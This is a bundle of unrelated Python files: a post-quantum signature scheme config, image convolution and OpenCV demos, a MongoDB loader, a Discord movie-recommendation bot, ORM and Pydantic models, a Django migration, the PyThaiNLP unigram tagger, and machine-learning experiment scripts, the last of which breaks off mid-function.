        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowIIIc_cyclic": {
        "path": "rainbowIIIc-cyclic",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowIIIc_cyclic_compressed": {
        "path": "rainbowIIIc-cyclic-compressed",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowVc_classic": {
        "path": "rainbowVc-classic",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowVc_cyclic": {
        "path": "rainbowVc-cyclic",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    "rainbowVc_cyclic_compressed": {
        "path": "rainbowVc-cyclic-compressed",
        "is_sign": True,
        "generate_in_threadpool": True,
        "sign_in_threadpool": True,
        "verify_in_threadpool": True,
    },
    # SPHINCS+ family: <hash>-<security level><f=fast|s=small>-<robust|simple>
    "sphincs_haraka_128f_robust": {"path": "sphincs-haraka-128f-robust", "is_sign": True},
    "sphincs_haraka_128f_simple": {"path": "sphincs-haraka-128f-simple", "is_sign": True},
    "sphincs_haraka_128s_robust": {"path": "sphincs-haraka-128s-robust", "is_sign": True},
    "sphincs_haraka_128s_simple": {"path": "sphincs-haraka-128s-simple", "is_sign": True},
    "sphincs_haraka_192f_robust": {"path": "sphincs-haraka-192f-robust", "is_sign": True},
    "sphincs_haraka_192f_simple": {"path": "sphincs-haraka-192f-simple", "is_sign": True},
    "sphincs_haraka_192s_robust": {"path": "sphincs-haraka-192s-robust", "is_sign": True},
    "sphincs_haraka_192s_simple": {"path": "sphincs-haraka-192s-simple", "is_sign": True},
    "sphincs_haraka_256f_robust": {"path": "sphincs-haraka-256f-robust", "is_sign": True},
    "sphincs_haraka_256f_simple": {"path": "sphincs-haraka-256f-simple", "is_sign": True},
    "sphincs_haraka_256s_robust": {"path": "sphincs-haraka-256s-robust", "is_sign": True},
    "sphincs_haraka_256s_simple": {"path": "sphincs-haraka-256s-simple", "is_sign": True},
    "sphincs_sha256_128f_robust": {"path": "sphincs-sha256-128f-robust", "is_sign": True},
    "sphincs_sha256_128f_simple": {"path": "sphincs-sha256-128f-simple", "is_sign": True},
    "sphincs_sha256_128s_robust": {"path": "sphincs-sha256-128s-robust", "is_sign": True},
    "sphincs_sha256_128s_simple": {"path": "sphincs-sha256-128s-simple", "is_sign": True},
    "sphincs_sha256_192f_robust": {"path": "sphincs-sha256-192f-robust", "is_sign": True},
    "sphincs_sha256_192f_simple": {"path": "sphincs-sha256-192f-simple", "is_sign": True},
    "sphincs_sha256_192s_robust": {"path": "sphincs-sha256-192s-robust", "is_sign": True},
    "sphincs_sha256_192s_simple": {"path": "sphincs-sha256-192s-simple", "is_sign": True},
    "sphincs_sha256_256f_robust": {"path": "sphincs-sha256-256f-robust", "is_sign": True},
    "sphincs_sha256_256f_simple": {"path": "sphincs-sha256-256f-simple", "is_sign": True},
    "sphincs_sha256_256s_robust": {"path": "sphincs-sha256-256s-robust", "is_sign": True},
    "sphincs_sha256_256s_simple": {"path": "sphincs-sha256-256s-simple", "is_sign": True},
    "sphincs_shake256_128f_robust": {"path": "sphincs-shake256-128f-robust", "is_sign": True},
    "sphincs_shake256_128f_simple": {"path": "sphincs-shake256-128f-simple", "is_sign": True},
    "sphincs_shake256_128s_robust": {"path": "sphincs-shake256-128s-robust", "is_sign": True},
    "sphincs_shake256_128s_simple": {"path": "sphincs-shake256-128s-simple", "is_sign": True},
    "sphincs_shake256_192f_robust": {"path": "sphincs-shake256-192f-robust", "is_sign": True},
    "sphincs_shake256_192f_simple": {"path": "sphincs-shake256-192f-simple", "is_sign": True},
    "sphincs_shake256_192s_robust": {"path": "sphincs-shake256-192s-robust", "is_sign": True},
    "sphincs_shake256_192s_simple": {"path": "sphincs-shake256-192s-simple", "is_sign": True},
    "sphincs_shake256_256f_robust": {"path": "sphincs-shake256-256f-robust", "is_sign": True},
    "sphincs_shake256_256f_simple": {"path": "sphincs-shake256-256f-simple", "is_sign": True},
    "sphincs_shake256_256s_robust": {"path": "sphincs-shake256-256s-robust", "is_sign": True},
    "sphincs_shake256_256s_simple": {"path": "sphincs-shake256-256s-simple", "is_sign": True},
}
|
from PIL import Image
import numpy as np
# Read the input image and convert it to single-channel grayscale ('L').
img = Image.open('500.png').convert('L')  # monochrome
img.save('result21.png')
image_array = np.array(img)
# Pixels are 0..255; divide by 255 to normalize them into [0, 1].
image_array = image_array / 255.0
print (image_array.shape)
# Establish kernel and stride.
# Output matrix is (n-f+1) x (n-f+1), where n is the input size and f the
# kernel size along the same dimension: 500 - 3 + 1 = 498.
Kernel= np.array([[1,0,-1],[2,0,-2],[3,0,-3]])
stride=1  # stride is fixed at 1, implicit in the loops below
output = np.zeros((498,498))
# Fix: removed the unused `output1`, `B0` and `k` variables and dead
# commented-out code from the original.
for i in range(498):
    for j in range(498):
        # 3x3 window at row j, column i: note i indexes columns here, which
        # is why the result is transposed before saving.
        C = image_array[0+j:3+j,0+i:3+i]
        piece_wise = np.multiply(C,Kernel)
        output[i,j]=np.sum(piece_wise)
# Rescale the convolution output into the displayable 0..255 uint8 range.
rescaled = (255.0 / output.max() * (output - output.min())).astype(np.uint8)
# The image was built transposed (see loop above), so transpose it back.
rescaled = rescaled.T
im=Image.fromarray(rescaled)
im.save('convolutional_output_2.png')
|
# draw lines on a canvas
import numpy as np
import cv2
# Black 300x400 canvas; OpenCV images are (height, width, channels) uint8.
canvas = np.zeros((300, 400, 3), dtype = "uint8")
# OpenCV colours are BGR tuples, not RGB.
green = (0, 255, 0)
red = (0, 0, 255)
cv2.line(canvas, (0, 10), (200, 290), green) # (x1,y1), (x2,y2)
cv2.line(canvas, (190, 290), (390, 10), red, 3)  # thickness 3 px
cv2.imshow("My Art", canvas) # create a single window
cv2.waitKey(0)  # block until any key is pressed
cv2.destroyAllWindows()
#!/usr/bin/python
# -*- coding: utf-8 -*-
# author: Jan Hybs
from flowrunner.db.mongo import MongoDB
from flowrunner.utils import io, lists
from flowrunner.utils.logger import Logger
from flowrunner.utils.timer import Timer
logger = Logger(__name__)
timer = Timer()
class Experiments(object):
    """Inserts experiment results from disk folders into MongoDB."""
    def __init__(self, mongo):
        """
        :type mongo: flowrunner.db.mongo.MongoDB
        """
        self.mongo = mongo
    def insert_one(self, dirname):
        """Extract environment and calibration data from one folder and insert it."""
        with timer.measured('Processing one, folder {dirname}'.format(dirname=dirname), False):
            env = self.mongo._extract_environment(io.join_path(dirname, 'environment.json'))
            cal = self.mongo._extract_calibration(io.join_path(dirname, 'performance.json'))
            env['cal'] = cal
            self.mongo.insert_process(dirname, env)
    def insert_many(self, dirname, filters=None):
        """Insert every sub-folder of *dirname*, optionally narrowed by *filters*.

        :param filters: optional iterable of predicates applied to the folder
            list.  Fix: the original used a mutable default ``filters=[]``,
            which is shared between calls.
        """
        dirs = io.listdir(dirname)
        for f in (filters or []):
            dirs = lists.filter(dirs, f)
        with timer.measured('Processing many, folder {dirname}'.format(dirname=dirname), False):
            for dir in dirs:
                self.insert_one(dir)
# Wipe the database, then re-insert the article experiment folders.
mongo = MongoDB()
mongo.remove_all()
mongo.close()
mongo = MongoDB()
# Fix: reuse the freshly opened connection instead of creating yet another
# MongoDB instance that was never closed.
experiments = Experiments(mongo)
# experiments.insert_many('/home/jan-hybs/Dropbox/meta', [lambda x: str(x).startswith('test')])
meta_folder = r'c:\Users\Jan\Dropbox\meta'
experiments.insert_many(io.join_path(meta_folder, 'article', 'A'))
experiments.insert_many(io.join_path(meta_folder, 'article', 'B'))
experiments.insert_many(io.join_path(meta_folder, 'article', 'C'))
# experiments.insert_one('/home/jan-hybs/Dropbox/meta/test-13')
import os
import pandas as pd
import warnings
warnings.filterwarnings('ignore')
from discord.ext import commands
import difflib
from recommendationKNN import predict_score
import json
# Precomputed mapping: movie title -> list of recommended titles.
knn_recommendations=json.load(open('KNN_recommendation.json'))
# Movie metadata; the 'original_title' column is used for lookups below.
movies = pd.read_csv('movie recommendations/processedfinalfile.csv')
bot = commands.Bot(command_prefix='!')
@bot.event
async def on_ready():
    # Fired once the bot has finished logging in to Discord.
    print(f'{bot.user.name} has connected to Discord!')
@bot.command()
async def recommend_KNN(ctx, *args):
    """Look up a movie title and reply with KNN-based recommendations.

    Fix: membership on a pandas Series (``x in series``) tests the *index
    labels*, not the values, so the title check could never succeed;
    convert the column to a list of values first.
    """
    print(ctx.author.id)
    moviename = ' '.join(args)
    print(f"User: {ctx.author.name}\nGuild: {ctx.guild}\nMovie: {moviename}\nType: Title")
    await ctx.reply(f"Trying to look up the movie")
    print(f"Searched term : {moviename}")
    if moviename not in movies['original_title'].tolist():
        # Unknown title: offer close fuzzy matches the user can retry with.
        probable_movie_list=difflib.get_close_matches(moviename,movies['original_title'])
        print(probable_movie_list)
        await ctx.reply("**Is the movie you wanted in one of these?**\nIf yes copy paste and use the command with this again\n"+'\n'.join(probable_movie_list))
    else:
        await ctx.channel.send("Is the movie you are searching for ? ")
        await ctx.send(moviename)
        print("search begins")
        await ctx.send('\n\n\n\n'+ predict_score(moviename) + '\n\n\n\n')
        print("search complete")
@bot.command()
async def rKNN(ctx, *args):
    """Recommend movies via the live KNN model, with fuzzy-match fallback."""
    print(ctx.author.id)
    moviename = ' '.join(args)
    print(f"User: {ctx.author.name}\nGuild: {ctx.guild}\nMovie: {moviename}\nType: Title")
    await ctx.reply(f"Trying to look up the movie")
    print(f"Searched term : {moviename}")
    known_titles = movies['original_title'].tolist()
    if moviename in known_titles:
        # Exact title found: confirm it and run the KNN predictor.
        await ctx.channel.send("Is the movie you are searching for ? ")
        await ctx.send(moviename)
        print("search begins")
        await ctx.send('\n\n\n\n'+ predict_score(moviename) + '\n\n\n\n')
        print("search complete")
    else:
        # Offer close fuzzy matches the user can retry with.
        probable_movie_list = difflib.get_close_matches(moviename, movies['original_title'])
        print(probable_movie_list)
        await ctx.reply("**Is the movie you wanted in one of these?**\nIf yes copy paste and use the command with this again\n"+'\n'.join(probable_movie_list))
@bot.command()
async def rKNN_indexed(ctx, *args):
    """Serve precomputed KNN recommendations from the JSON index."""
    print(ctx.author.id)
    moviename = ' '.join(args)
    print(f"User: {ctx.author.name}\nGuild: {ctx.guild}\nMovie: {moviename}\nType: Title")
    await ctx.reply(f"Trying to look up the movie")
    print(f"Searched term : {moviename}")
    if moviename in knn_recommendations:
        # Title is in the index: confirm it and send the stored list.
        await ctx.channel.send("Is the movie you are searching for ? ")
        await ctx.send(moviename)
        recommended = knn_recommendations[moviename]
        outputtext = '\n'.join(['Here are the recommendations :'] + recommended)
        print("search begins")
        await ctx.send('\n\n\n\n'+ outputtext + '\n\n\n\n')
        print("search complete")
    else:
        # Offer close fuzzy matches the user can retry with.
        probable_movie_list = difflib.get_close_matches(moviename, knn_recommendations.keys())
        print(probable_movie_list)
        await ctx.reply("**Is the movie you wanted in one of these?**\nIf yes copy paste and use the command with this again\n"+'\n'.join(probable_movie_list))
# The bot token comes from the environment — never hard-code it.
TOKEN = os.environ['DISCORD_BOT_SECRET']
bot.run(TOKEN)
|
from app import db
class News(db.Model):
    """The basic data for news items"""
    __tablename__ = "News"
    NewsID = db.Column(db.Integer, primary_key=True)
    Title = db.Column(db.String(255), nullable=False)
    Contents = db.Column(db.Text, nullable=False)
    Author = db.Column(db.String(255), nullable=False)
    # Created is required; Updated stays NULL until the item is edited.
    Created = db.Column(db.DateTime, nullable=False)
    Updated = db.Column(db.DateTime)
class NewsCategories(db.Model):
    """Defines the display values for categories that can be selected for news."""
    __tablename__ = "NewsCategories"
    NewsCategoryID = db.Column(db.Integer, primary_key=True)
    # Human-readable category label shown in the UI.
    Category = db.Column(db.String(255), nullable=False)
class NewsCategoriesMapping(db.Model):
    """The mapping between News items and NewsCategories"""
    __tablename__ = "NewsCategoriesMapping"
    NewsCategoriesMappingID = db.Column(db.Integer, primary_key=True)
    # Deleting a News row cascades to its mapping rows.
    NewsID = db.Column(
        db.Integer, db.ForeignKey("News.NewsID", ondelete="CASCADE"), nullable=False
    )
    # NOTE(review): unlike NewsID, this column has no ForeignKey to
    # NewsCategories.NewsCategoryID — confirm whether that is intentional.
    NewsCategoryID = db.Column(db.Integer, nullable=False)
|
# create pydantic model
# Pydantic also uses the term "model" to refer to something different,
# the data validation, conversion, and documentation classes and instances
# Pydantic models (schemas) that will be used when reading data, when returning it from the API.
from typing import List,Optional
# BaseModel , pydantic provides a dataclass decorator which creates (almost) vanilla python dataclasses with input data parsing and validation.
from pydantic import BaseModel
class BlogBase(BaseModel):
    # Shared blog fields.  NOTE(review): "titel"/"catagory" look like typos
    # for "title"/"category", but they are part of the API schema — renaming
    # them would break existing clients.
    titel:str
    body:str
    catagory:str
class Blog(BlogBase):
    class Config():
        orm_mode=True
    # Pydantic's orm_mode will tell the Pydantic model to read the data even
    # if it is not a dict, but an ORM model (or any other arbitrary object with attributes)
class User(BaseModel):
    # Full user record including the plain password (input side).
    name:str
    email:str
    password:str
    class Config():
        orm_mode=True
class ShowUser(BaseModel):
    # Public view of a user — deliberately omits the password.
    name:str
    email:str
    blogs:List[Blog]=[]
    class Config():
        orm_mode=True
class ShowBlog(BaseModel):
    # titel:str
    # body:str
    # catagory:str
    # Response schema: only the blog's creator is exposed.
    creator:ShowUser
    class Config():
        orm_mode=True
class Token(BaseModel):
    # OAuth2 bearer-token response body.
    access_token:str
    token_type:str
class TokenData(BaseModel):
    # Payload decoded from an access token.
    email:Optional[str]=None
class UseInDB(User):
    # NOTE(review): name looks like a typo for "UserInDB" — kept as-is to
    # avoid breaking importers.
    hashed_password:str
class UserCreate(User):
    password:str
class createcode(BaseModel):
    # name:str
    code:str
    password:str
class LogConfig(BaseModel):
    """Logging configuration to be set for the server"""
    LOGGER_NAME: str = "mycoolapp"
    LOG_FORMAT: str = "%(levelprefix)s | %(asctime)s | %(message)s"
    LOG_LEVEL: str = "DEBUG"
    # dictConfig-style logging setup passed to uvicorn.
    # NOTE(review): the logger configured below is "foo-logger", not
    # LOGGER_NAME ("mycoolapp") — confirm which name the app actually uses.
    log_config = {
        "version": 1,
        "disable_existing_loggers": False,
        "formatters": {
            "default": {
                "()": "uvicorn.logging.DefaultFormatter",
                "fmt": "%(levelprefix)s %(asctime)s %(message)s",
                "datefmt": "%Y-%m-%d %H:%M:%S",
            },
        },
        "handlers": {
            "default": {
                "formatter": "default",
                "class": "logging.StreamHandler",
                "stream": "ext://sys.stderr",
            },
        },
        "loggers": {
            "foo-logger": {"handlers": ["default"], "level": "DEBUG"},
        },
    }
} |
"""
Demo by G. Brammer
"""
import numpy as np
from voronoi import bin2d
import matplotlib.pyplot as plt
# Noisy gaussian
yp, xp = np.indices((100,100))
R = np.sqrt((xp-50)**2+(yp-50)**2)
sigma = 10
g = 10*np.exp(-R**2/2/sigma**2)
s = 1
noise = np.random.normal(size=R.shape)*s
# Voronoi-bin the noisy image; presumably 20. is the target S/N per bin —
# confirm against the bin2d documentation.
pix_bin, bin_x, bin_y, bin_sn, bin_npix, scale = bin2d.bin2d(xp.flatten(), yp.flatten(), (g+noise).flatten(), g.flatten()*0+s, 20., cvt=True, wvt=False, graphs=False, quiet=False)
# Bin stats
bad = bin_sn < 5
masked = pix_bin*1
mean_bins = pix_bin*0.
median_bins = pix_bin*0.
mea = bin_x*0.
med = bin_x*0.
bx = bin_x*0.
by = bin_y*0.
bin_ids = np.unique(pix_bin)
# Per-bin mean/median flux and centroid, painted back onto the pixel grid.
for i in range(len(bin_ids)):
    bin_mask = pix_bin == bin_ids[i]
    mea[i] = (g+noise).flatten()[bin_mask].mean()
    mean_bins[bin_mask] = mea[i]
    med[i] = np.median((g+noise).flatten()[bin_mask])
    median_bins[bin_mask] = med[i]
    bx[i] = np.sum(xp.flatten()*bin_mask)/bin_mask.sum()
    by[i] = np.sum(yp.flatten()*bin_mask)/bin_mask.sum()
# Flag pixels belonging to low-S/N bins (note: `bin` shadows the builtin).
for bin in np.where(bad)[0]:
    bin_mask = pix_bin == bin
    masked[bin_mask] = -99
# Plot: bin map with centroids, noisy input, and per-bin medians.
plt.rcParams['image.origin'] = 'lower'
fig = plt.figure(figsize=[9, 2.8])
ax = fig.add_subplot(131)
ax.imshow(pix_bin.reshape(R.shape))
ax.scatter(bin_x, bin_y, marker='.', color='k', alpha=0.1)
ax = fig.add_subplot(132)
ax.imshow(g+noise, vmin=-0.1, vmax=10, cmap='gray_r')
ax = fig.add_subplot(133)
ax.imshow(median_bins.reshape(R.shape), vmin=-0.1, vmax=10, cmap='gray_r')
for ax in fig.axes:
    ax.set_xticklabels([]); ax.set_yticklabels([])
fig.tight_layout(pad=0.1)
fig.savefig('test.png')
|
import matplotlib.pyplot as plt
from matplotlib import pyplot
import matplotlib as mpl
import numpy as np
import pandas as pd
import colormaps as cmaps
# Register the bundled viridis colormap and make it the default.
plt.register_cmap(name='viridis', cmap=cmaps.viridis)
plt.set_cmap(cmaps.viridis)
# Make a figure and axes with dimensions as desired.
fig, ax = plt.subplots(figsize=[1, 10])
# Set the colormap and norm to correspond to the data for which
# the colorbar will be used.
norm = mpl.colors.Normalize(vmin=0, vmax=1)
# ColorbarBase derives from ScalarMappable and puts a colorbar
# in a specified axes, so it has everything needed for a
# standalone colorbar. There are many more kwargs, but the
# following gives a basic continuous colorbar with ticks
# and labels.
bounds = [0, 1]
cb1 = mpl.colorbar.ColorbarBase(ax,
                                norm=norm,
                                ticks=bounds,
                                orientation='vertical')
plt.tight_layout()
# Hide the figure/axes background patches so only the bar itself is drawn.
for item in [fig, ax]:
    item.patch.set_visible(False)
plt.savefig('colormap.png', format='png', dpi=900)  # high-dpi export
plt.show()
# Generated by Django 2.2.4 on 2019-08-23 03:00
from django.db import migrations, models
import django.db.models.deletion
import django.utils.timezone
class Migration(migrations.Migration):
    # Auto-generated initial migration for the Novel app (Carousel, Menu,
    # NovelUser, Novel, Comment).  Django tracks migration state by these
    # operations — edit with care.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Carousel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.CharField(max_length=20, verbose_name='滚动字幕')),
                ('color', models.CharField(max_length=20, verbose_name='字体颜色')),
            ],
            options={
                'verbose_name': '轮播表',
            },
        ),
        migrations.CreateModel(
            name='Menu',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=20, verbose_name='小说分类')),
            ],
            options={
                'verbose_name': '标题表',
            },
        ),
        migrations.CreateModel(
            name='NovelUser',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('pen_name', models.CharField(max_length=16, verbose_name='笔名/用户名')),
                ('password', models.CharField(max_length=20)),
                ('name', models.CharField(max_length=12, verbose_name='真实姓名')),
                ('email', models.CharField(max_length=20, null=True)),
            ],
            options={
                'verbose_name': '用户表',
            },
        ),
        # Novel and Comment are created last because they hold foreign keys
        # to the models above.
        migrations.CreateModel(
            name='Novel',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('title', models.CharField(max_length=20, verbose_name='标题')),
                ('content', models.TextField(max_length=65530, verbose_name='正文')),
                ('create_time', models.DateTimeField(default=django.utils.timezone.now, verbose_name='创作时间')),
                ('read_times', models.IntegerField(default=0, verbose_name='阅读次数')),
                ('level', models.IntegerField(verbose_name='小说等级,对2求余分5等')),
                ('menu', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Novel.Menu', verbose_name='关联大分类标题')),
                ('novel_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Novel.NovelUser', verbose_name='关联用户')),
            ],
            options={
                'verbose_name': '小说表',
            },
        ),
        migrations.CreateModel(
            name='Comment',
            fields=[
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('content', models.CharField(max_length=200, verbose_name='评论内容')),
                ('novel', models.ForeignKey(default=None, on_delete=django.db.models.deletion.CASCADE, to='Novel.Novel', verbose_name='关联小说')),
                ('novel_user', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, to='Novel.NovelUser', verbose_name='关联用户')),
            ],
            options={
                'verbose_name': '评论表',
            },
        ),
    ]
|
#!/usr/bin/python
import re
def readNext(file):
    """Return the next non-empty line from *file*, stripped, or "" at EOF."""
    while True:
        line = file.readline()
        if not line:
            return ""  # end of file
        line = line.strip()
        if line:
            return line
def readNextWithTag(file, tagName):
    """Read the next non-empty line and return the text after "<tagName> "."""
    line = readNext(file)
    return re.match(re.compile(r"%s (.*)" % tagName), line).group(1)
def readODName(file):
    """Extract the OD-pair name from the next "...[ # <name> flow" line."""
    line = readNext(file)
    return re.match(re.compile(r'.*\[ # (.*) flow'), line).group(1)
def readSP(str):
    """Parse a shortest-path line into [space-joined link names, cost].

    *str* looks like ``... [ 'link1', 'link2' ] ... cost 3.5``.
    Fix: the original matched the same regex against the line twice (once
    for the links, once for the cost); match once and reuse the groups.
    Note the parameter name shadows the ``str`` builtin; kept for interface
    compatibility.
    """
    regex = re.compile(r'.*\[(.*)\].*cost (.*)')  # group 1: raw link list, group 2: cost
    regex_linkName = re.compile(r'\'(.*)\',*')  # extracts the name from 'name',
    m = re.match(regex, str)
    links = m.group(1).split()
    linkNames = [re.match(regex_linkName, token).group(1) for token in links]
    cost = m.group(2)
    return [' '.join(linkNames), cost]
|
# -*- coding: utf-8 -*-
# Copyright (C) 2016-2023 PyThaiNLP Project
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Unigram Part-Of-Speech tagger
"""
import json
import os
from typing import List, Tuple
from pythainlp.corpus import corpus_path, get_corpus_path
from pythainlp.tag import blackboard, orchid
_ORCHID_FILENAME = "pos_orchid_unigram.json"
_ORCHID_PATH = os.path.join(corpus_path(), _ORCHID_FILENAME)
_PUD_FILENAME = "pos_ud_unigram-v0.2.json"
_PUD_PATH = os.path.join(corpus_path(), _PUD_FILENAME)
_BLACKBOARD_NAME = "blackboard_unigram_tagger"
_ORCHID_TAGGER = None
_PUD_TAGGER = None
_BLACKBOARD_TAGGER = None
def _orchid_tagger():
    """Lazy-load and cache the ORCHID unigram tag dictionary."""
    global _ORCHID_TAGGER
    if _ORCHID_TAGGER:
        return _ORCHID_TAGGER
    with open(_ORCHID_PATH, encoding="utf-8-sig") as fin:
        _ORCHID_TAGGER = json.load(fin)
    return _ORCHID_TAGGER
def _pud_tagger():
    """Lazy-load and cache the PUD unigram tag dictionary."""
    global _PUD_TAGGER
    if _PUD_TAGGER:
        return _PUD_TAGGER
    with open(_PUD_PATH, encoding="utf-8-sig") as fin:
        _PUD_TAGGER = json.load(fin)
    return _PUD_TAGGER
def _blackboard_tagger():
    """Lazy-load and cache the Blackboard unigram tag dictionary."""
    global _BLACKBOARD_TAGGER
    if _BLACKBOARD_TAGGER:
        return _BLACKBOARD_TAGGER
    corpus_file = get_corpus_path(_BLACKBOARD_NAME)
    with open(corpus_file, encoding="utf-8-sig") as fin:
        _BLACKBOARD_TAGGER = json.load(fin)
    return _BLACKBOARD_TAGGER
def _find_tag(
words: List[str], dictdata: dict, default_tag: str = ""
) -> List[Tuple[str, str]]:
keys = list(dictdata.keys())
return [
(word, dictdata[word]) if word in keys else (word, default_tag)
for word in words
]
def tag(words: List[str], corpus: str = "pud") -> List[Tuple[str, str]]:
    """
    :param list words: a list of tokenized words
    :param str corpus: corpus name (orchid or pud)
    :return: a list of tuples (word, POS tag)
    :rtype: list[tuple[str, str]]
    """
    if not words:
        return []
    # A "_ud" suffix requests conversion to Universal Dependencies tags.
    to_ud = corpus.endswith("_ud")
    if corpus in ("orchid", "orchid_ud"):
        processed = orchid.pre_process(words)
        word_tags = orchid.post_process(_find_tag(processed, _orchid_tagger()), to_ud)
    elif corpus in ("blackboard", "blackboard_ud"):
        processed = blackboard.pre_process(words)
        word_tags = blackboard.post_process(_find_tag(processed, _blackboard_tagger()), to_ud)
    else:  # default, use "pud" as a corpus
        word_tags = _find_tag(words, _pud_tagger())
    return word_tags
|
import numpy as np
import datetime
import pandas as pd
from tqdm import tqdm
import os, sys
sys.path.append(os.path.join(os.path.dirname(__file__), ".."))
import model_opt
import algo_GD
import helper
import noise
if __name__ == "__main__":
    # Repeat a noisy SGD run on the Rosenbrock function `t` times and store
    # the final weights together with the noise IQR of each trial.
    args = sys.argv
    t = int(args[1])  # number of trials
    w_init = np.array([3, 3])
    _t_max = 1000  # SGD iterations per trial
    f = model_opt.RosenBrock()
    w_star = f.w_star
    last_w_store = []
    iqr_store = []
    for trial in tqdm(range(t)):
        #var = np.random.randint(1,300,1)[0]
        var = 55 # iqr 70~80
        noise_data = noise.Gauss(mean=0, sigma=var, dim=2, n=_t_max).generate()
        iqr = helper.iqr(noise_data)
        algo = algo_GD.SGD(w_init=w_init, t_max=_t_max, a=0.00078)
        # Fix: the inner loop reused `i`, shadowing the outer trial counter.
        for _ in algo:
            noise_value = noise_data[algo.t - 1]
            f = model_opt.RosenBrock(noise_value=noise_value)
            algo.update(model=f)
        last_w_store.append(algo.w)
        iqr_store.append(iqr)
    dt_now = datetime.datetime.now()
    last_w_store = np.array(last_w_store)
    data = np.array([iqr_store, last_w_store[:, 0], last_w_store[:, 1]]).T
    df = pd.DataFrame(data=data, columns=['iqr', 'w_0', 'w_1'])
    df.to_csv('gauss_noise/gauss_noise_last_w{}.csv'.format(dt_now), header=True)
|
import sys
import numpy as np
import torch
import torch.nn as nn
import torch.optim as optim
from torch.autograd import Variable
from sklearn.metrics import confusion_matrix
from utils import set_random_seed, get_minibatches_idx, get_weighted_minibatches_idx
from models import ResNet18, VGG
from data import save_train_data, save_test_data, load_data_from_pickle
torch.backends.cudnn.deterministic = True
torch.backends.cudnn.benchmark = False
torch.set_default_tensor_type('torch.cuda.FloatTensor')
def build_model(config):
    """Build the network, loss, and SGD optimizer described by *config*.

    :param config: dict with 'model' ('ResNet18'/'VGG11'/'VGG13'),
        'color_channel', 'lr', 'momentum', 'weight_decay'.
    :raises ValueError: for an unknown 'model' option.  Fix: the original
        printed a message and returned ``model=None``, which then crashed
        with a confusing AttributeError in ``optim.SGD``.
    """
    if config['model'] == 'ResNet18':
        model = ResNet18(color_channel=config['color_channel'])
    elif config['model'] == 'VGG11':
        model = VGG('VGG11', color_channel=config['color_channel'])
    elif config['model'] == 'VGG13':
        model = VGG('VGG13', color_channel=config['color_channel'])
    else:
        raise ValueError('wrong model option')
    loss_function = nn.CrossEntropyLoss()
    optimizer = optim.SGD(model.parameters(), lr=config['lr'], momentum=config['momentum'],
                          weight_decay=config['weight_decay'])
    return model, loss_function, optimizer
def get_weighted_idx(trainloader, config):
    """Indices of samples whose label is >= config['t1']."""
    threshold = config['t1']
    return [idx for idx, sample in enumerate(trainloader)
            if int(sample[1][0].item()) >= threshold]
def simple_train_batch(trainloader, model, loss_function, optimizer, config):
    """Train *model* with weighted minibatch sampling and a stepped LR schedule.

    The learning rate is divided by 10 at 1/3 and by 100 at 2/3 of the
    epochs; minibatches oversample config['weighted_idx'] samples by
    config['weight_ratio'].  Requires CUDA (inputs are moved to the GPU).
    """
    print('weighted idx', config['weighted_idx'])
    model.train()
    for epoch in range(config['epoch_num']):
        # Step learning-rate schedule.
        if epoch == int(config['epoch_num'] / 3):
            for g in optimizer.param_groups:
                g['lr'] = config['lr'] / 10
            print('divide current learning rate by 10')
        elif epoch == int(config['epoch_num'] * 2 / 3):
            for g in optimizer.param_groups:
                g['lr'] = config['lr'] / 100
            print('divide current learning rate by 10')
        total_loss = 0
        minibatches_idx = get_weighted_minibatches_idx(len(trainloader), config['simple_train_batch_size'],
                                                       config['weighted_idx'], config['weight_ratio'], shuffle=True)
        for minibatch in minibatches_idx:
            # Re-assemble each minibatch from individual samples on the CPU,
            # then move the stacked tensors to the GPU.
            inputs = torch.Tensor(np.array([list(trainloader[x][0].cpu().numpy()) for x in minibatch]))
            targets = torch.Tensor(np.array([list(trainloader[x][1].cpu().numpy()) for x in minibatch]))
            inputs, targets = Variable(inputs.cuda()).squeeze(1), Variable(targets.long().cuda()).squeeze()
            optimizer.zero_grad()
            outputs = model(inputs).squeeze()
            loss = loss_function(outputs, targets)
            total_loss += loss
            loss.backward()
            optimizer.step()
        print('epoch:', epoch, 'loss:', total_loss)
def simple_test_batch(testloader, model, config):
    """Evaluate *model* on *testloader*.

    Returns (overall accuracy, big-class accuracy, small-class accuracy,
    confusion matrix), where classes < config['t1'] are "big" and the rest
    are "small"; small-class accuracy is None when t1 == 10.
    """
    model.eval()
    total = 0.0
    correct = 0.0
    minibatches_idx = get_minibatches_idx(len(testloader), minibatch_size=config['simple_test_batch_size'],
                                          shuffle=False)
    y_true = []
    y_pred = []
    for minibatch in minibatches_idx:
        inputs = torch.Tensor(np.array([list(testloader[x][0].cpu().numpy()) for x in minibatch]))
        targets = torch.Tensor(np.array([list(testloader[x][1].cpu().numpy()) for x in minibatch]))
        inputs, targets = Variable(inputs.cuda()).squeeze(1), Variable(targets.cuda()).squeeze()
        outputs = model(inputs)
        _, predicted = torch.max(outputs, 1)  # argmax over class logits
        total += targets.size(0)
        correct += predicted.eq(targets.long()).sum().item()
